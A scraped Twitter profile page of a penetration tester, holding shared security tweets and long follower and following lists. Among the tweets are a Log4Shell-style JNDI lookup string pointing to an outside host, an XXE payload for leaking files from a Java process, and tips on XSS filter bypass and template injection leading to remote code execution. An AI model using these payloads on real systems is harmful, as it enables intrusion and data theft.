Petre Popescu @ptrsec
Penetration tester. Bucharest, Romania Joined December 2016-
Tweets431
-
Followers124
-
Following288
-
Likes973
🔥 A tip for getting RCE in Jetty apps with just one XML file!
The results are in! We're proud to announce the Top 10 Web Hacking Techniques of 2021! portswigger.net/research/top-1…
Have you got a tricky XSS filter to bypass? Consuming tags can help because they can fool the filter into incorrectly allowing harmful markup: portswigger.net/web-security/c…
iOS exploits: builds a 64-bit virtual machine from 70,000 AND/OR/XOR/XAND logic gates inside a corrupted PDF just to run jailbreak code Java exploits: ${jndi:ldaps://notnow.dev:3389/lol}
iOS exploits: builds a 64-bit virtual machine from 70,000 AND/OR/XOR/XAND logic gates inside a corrupted PDF just to run jailbreak code Java exploits: ${jndi:ldaps://notnow.dev:3389/lol}
WTF!! This has security implications. JS always surprises me 😮
WTF!! This has security implications. JS always surprises me 😮
woooooooooo github.com/tangxiaofeng7/…
In our #HITCON #CTF 2021, I made a PHP warmup challenge that can be only solved by Norway teams. Could you spot the vulnerability? gist.github.com/orangetw/76504…
If your exploiting your XXE under Java, I recommend a payload like this: <!DOCTYPE root [ <!ENTITY stuff SYSTEM "."> ]><root>&stuff;</root> So that you can start the file leak from the CWD of the Java process. This is important when chaining for an RCE.
We've posted some in-depth guidance on how to make Turbo Intruder attacks go as fast as possible. If you think we're missing any tricks, let us know! portswigger.net/research/turbo…
DEF CON 29 - Ionut Cernica - Hack the hackers Leaking data over SSL TLS youtube.com/watch?v=WNXEuF…
HTTP/2: The Sequel is Always Worse by @albinowax portswigger.net/research/http2
Kubernetes Hardening guide by the NSA: media.defense.gov/2021/Aug/03/20…
New blog post: joonas.fi/2021/08/saml-i…
Parsing differentials are my favourite breed of bugs these days. Nice example thezdi.com/blog/2021/7/7/…
Finding DOM Polyglot XSS in PayPal the Easy Way by @garethheyes portswigger.net/research/findi…
Spring and FreeMarker Template Injection? You can still read any file under TemplateClassResolver.SAFER_RESOLVER. This was enough for me to get RCE.
Need to exploit blind XXE but limited to the file:// protocol? Turns out file URLs can trigger FTP connections in Java! Nice finding by @airrera / @Immunityinc immunityservices.blogspot.com/2021/02/miscon…
Just Published a write-up. "The Secret Parameter, LFR, and Potential RCE in NodeJS Apps" blog.shoebpatel.com/2021/01/23/The… #BugBountytip #BugBounty #NodeJS #ctf
When testing password fields, my preferred password is: %01%E2%80%AEalert%0D%0A Let's break it down: %01 is SOH %e2%80%ae is RTLO %0d%0a is CRLF Test cases on login: 1. can I log in only using %01? 2. without the CRLF in it? 3. is trela accepted instead of alert? (due to RTLO)
GHSL-2020-205: Remote Code Execution in Apache Struts 2 - S2-061 - CVE-2020-17530 github.co/2W9jOod
sandesh @onceuponahacker
381 Followers 1K Following cybersecurity , ethical hacking ...ALL VIEWS expressed here ARE MINE... 🇮🇳 Jai Hind !
Mr Elliot @eliotsec
0 Followers 2K Following
Sezioux @sezioux
38 Followers 658 Following
Aaditya @TipsyTux
484 Followers 751 Following - Security Engineer @amazon - OSCP| OSWA| eWPTX | eCPTX | PNPT| eJPT | CRTP | CEH
Heappie @Heappie420
137 Followers 390 Following Experienced with in-the-field hacking. Arguably enjoy breaking stuff more than fixing it. One of the founding members of the HTsP CTF team.
Boogy @0xboogy
639 Followers 1K Following Cloud Security Architect, Pentester, Cyber Security enthusiast. I live where there is a shell 👀! Twitter is my bookmark 🔖
pligonstein @yakuhitoJr
68 Followers 324 Following Digital Forensics enthusiast | Penetration Tester
vidwath @_vidwath
146 Followers 915 Following
Ioana Rîjnețu @IoanaRijnetu
945 Followers 2K Following Content marketer | Agile Enthusiast |Scrum Master | Naturally curious about #contentmarketing, #agile, #books, #tech & what makes people tick.
\x00 CRASHES @michalbeza
103 Followers 1K Following ${191*7} && fuzz the world! ه҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿
hades @h4d3s101
154 Followers 1K Following
Jubayer Ahmed Rhyme @Jub4y3r_3x009
240 Followers 3K Following مهاجم آسيوي عشاق الأمن السيبراني | _-_ | المتعلم | باغ باونتي هنتر Web Application Security Researchers At Hackerone & Bugcrowd
Sunil @Sunil45_
1K Followers 755 Following Freelancer - Penetration Testing | Product Security Engineer at Funding Societies | Team Lead at Cobalt Labs | Red team member at Synack | Bug Bounty Hunter
Cristian Petrache @96_cristianp
2 Followers 18 Following
Ibra @him_lbrahim
7 Followers 374 Following
Harsh Bothra @harshbothra_
43K Followers 741 Following Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal
SkyNet Tools @SkyNetTools
7K Followers 5K Following Providing the Latest #Infosec #News, #Tools, and #Exploits #BugBounty
e0n @e0n16
55 Followers 1K Following
jayking @jaykingchenhack
4 Followers 157 Following
Ariyan @SidAriyan
9 Followers 2K Following
arthusu @ArthusuxD
851 Followers 3K Following Hacking web Pentester PHP coder Linkedin: https://t.co/awweoN7hK6
passket @passket
436 Followers 239 Following aka passket, some stuff in hacking, CTO of bpsec and advisory committee member for korea governs.
SecurityPatch.ro @PatchSecurity
351 Followers 750 Following 🇹🇩 Știri | Noutăți | Securitate cibernetică #SecurityPatch #cybersecurity #Romania
Ionut Pruteanu @PruteanuIonut
13 Followers 245 Following
Byungho Min @tais9
668 Followers 2K Following Infosec enthusiast, husband, father, son. This tweeter account is mainly for saving and sharing infosec stuff I encounter on the internet.
Ion Armeanu @IonArmeanu1
1K Followers 2K Following Professor at University of Bucharest, Physics Faculty, Mathematics
Optilight @optilightro
67 Followers 729 Following Ferestrele de mansarda Optilight sunt fabricate din materie prima de cea mai buna calitate, Ferestre de mansarda VB, Ferestre de mansarda VK
kelfitas @kelfitas
22 Followers 155 Following
thebishop @thebishop___
25 Followers 253 Following
Pierre Ernst @e_rnst
426 Followers 255 Following Father, Runner, Biker, Full-Stack-Security-Code-Reviewer, like-to-think-he-is-a-security-researcher, Remote worker, Cat Whisperer, Vegan food Eater
HackerStorm @hackerstorm
3K Followers 3K Following Official Twitter Account for HackerStorm where you can find lots of Free Stuff like our Cyber Security News App, Threat Research Tools and more!
Mayday.conf @MaydayConf
356 Followers 5K Following MayDay Security Conference - an international conference which is aimed to help you to enhance your knowledge in the cyber security field
Izaaa @Iza_za15
9 Followers 200 Following
Deanna @Deanna92646913
6 Followers 109 Following
Dust2.us @dust2us
28K Followers 717 Following Your home for North American Counter-Strike 2 | NA CS Megafans | 21+, Gambling Problem? Call 1-800-GAMBLER
Eduardo Nuri @eduardo_nuri
6K Followers 3K Following Father, Real Estate, SaaS founder of @octatech_io and sometimes Bug Bounty Hunter/Security Researcher.
Magnus Carlsen @MagnusCarlsen
1.1M Followers 139 Following World Chess Champion. Playing for @TeamLiquid. Download my app here👇
Hans Niemann @HansMokeNiemann
83K Followers 487 Following early access to the future of chess: https://t.co/4dBkUp3B02
Aaditya @TipsyTux
484 Followers 751 Following - Security Engineer @amazon - OSCP| OSWA| eWPTX | eCPTX | PNPT| eJPT | CRTP | CEH
Heappie @Heappie420
137 Followers 390 Following Experienced with in-the-field hacking. Arguably enjoy breaking stuff more than fixing it. One of the founding members of the HTsP CTF team.
Jonathan Jablonowski @EliGE
291K Followers 2K Following CS player for @FaZeClan Co-Owner @officialrefrag Staff @VoltaicAim Business Enquiries: [email protected]
Adrian Furtuna @AdrianFurtuna
100 Followers 63 Following Founder of https://t.co/BvFHzWQixc. Ethical hacker.
Dan Madesclaire @Vitality_apEX
333K Followers 739 Following Captain for @TeamVitalityCS 🐝 🏆 40+ international tournaments 💬 [email protected]
Russel van Dulken @Twistzz
322K Followers 516 Following Professional Counter-Strike Player for Liquid. https://t.co/B1AFuteAMs https://t.co/yXPu04a5Cf Waifu @aon1r ❤️😍
b1t @b1tcs
141K Followers 181 Following Professional CS2 player for @natusvincere https://t.co/7qniOPSTBE
NAVI Aleksi @AleksibCSGO
206K Followers 381 Following CS:GO Player for @natusvincere Business inquiries: [email protected]
IlyaO @FLCm0NESY
301K Followers 743 Following Professional CS2 player for @FalconsEsport https://t.co/NQDx6L44gz https://t.co/resY2JzpfT
Håvard Nygaard @FaZe_rainCS
410K Followers 334 Following Gamer for @FaZeClan. Business inquiries 👇 [email protected]
karrigan @karriganCSGO
539K Followers 527 Following Professional CS:GO player for @FaZeClan - MSc in BA and Auditing. Business enquiries: [email protected]
broky @broky
179K Followers 251 Following Professional CS2 player for @FaZeClan business inquiries: [email protected]
ZywOo @zywoo
470K Followers 744 Following CS player @TeamVitality 🐝 | Represented by Prodigy Agency | Business: [email protected] | My mouse: https://t.co/2mEJ8mYExa | Keyboard Ambassador @ASUS_ROG
neL @neLendirekt
52K Followers 3K Following CEO @CroissantStrike. The "Here is my report" guy. Ex 1PV @valleague_fr @flickshot_fr @VaKarM_net FR/EN. DMs open. Tweets are my own. #TeamOL
KRL @KRL_STREAM
40K Followers 773 Following 🟣 https://t.co/Klg9GpDxE7 Papa de @GenOneEsports Partners : @TWITCH @TurtleBeachFR @skinsmonkey @hellcasecom @Winamax 📩 [email protected]
Counter-Strike News @TheCSTimes
37K Followers 411 Following Your leading source for CS2 News and Fun.
HLTV.org @HLTVorg
760K Followers 177 Following The home of competitive Counter-Strike ⚡️ SoMe Partner: @thunderpickco (18+ Bet Responsibly)
OverDrive @ABOverDrive
40K Followers 209 Following Team Spirit scout, insider, CIS influencer, one of the best CS players of all time! Not journalist! https://t.co/Xi9WmQBBS0
Gabe Follower @gabefollower
216K Followers 417 Following Content Creator - CS2 × Deadlock × Valve (news, findings and leaks). Everything about a weird (in a good way) company that couldn't develop Half-Life 3.
NAVI @natusvincere
798K Followers 314 Following Home of the world's leading esports club Natus Vincere. #navination Follow us: @NAVIValorant @NAVILeague @NAVIMLBB_ @NAVIJunior @NAVIBrawlStars_ @NAVIChess
Hikaru Nakamura @GMHikaru
624K Followers 411 Following Proudly Team Falcons Chess Professional Content Creator Business email: [email protected]
CS2 @CounterStrike
2.2M Followers 380 Following Your favorite first person shooter’s favorite first person shooter.
Assetnote @assetnote
10K Followers 0 Following Assetnote combines advanced reconnaissance and high-signal continuous security analysis to help enterprises gain insight and control of their evolving exposure.
Infosec Memes @InfosecMemes_
4K Followers 399 Following Information security memes for penetration testing teams. ■ IG: infosecmemes ■
s1r1us @S1r1u5_
11K Followers 2K Following aham nityaṃ śiṣyaḥ, jagat mama guruḥ. {~hacker~} {founder @ElectrovoltSec, @HacktronAI}
Dafydd Stuttard @DafyddStuttard
7K Followers 78 Following Founder and Chief Swig at @PortSwigger. Creator of @Burp_Suite and @WebSecAcademy. Author of The Web Application Hacker's Handbook.
Doyensec @Doyensec
4K Followers 9 Following Doyensec works at the intersection of software development and offensive engineering. We discover vulnerabilities others cannot, and help mitigate the risk.
pligonstein @yakuhitoJr
68 Followers 324 Following Digital Forensics enthusiast | Penetration Tester
Cobalt @cobalt_io
9K Followers 562 Following Offensive security testing for security and development teams.
vidwath @_vidwath
146 Followers 915 Following
\x00 CRASHES @michalbeza
103 Followers 1K Following ${191*7} && fuzz the world! ه҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿҈̿
ZeusBox @Zeusb0x
780 Followers 351 Following Playing with Pandora's box. Sometimes it's better not to open it. Sometimes, it's better not to know.
publiclyDisclosed @disclosedh1
65K Followers 2 Following This is an unofficial HackerOne public disclosure watcher who keeps you up to date about the recently disclosed bugs. By @NOBBD
Sunil @Sunil45_
1K Followers 755 Following Freelancer - Penetration Testing | Product Security Engineer at Funding Societies | Team Lead at Cobalt Labs | Red team member at Synack | Bug Bounty Hunter
Laxman Muthiyah @LaxmanMuthiyah
5K Followers 32 Following Web Developer, Security Researcher, Whitehat hacker ;-) Definitely not a geek :P :D
Trends for United States
You might like
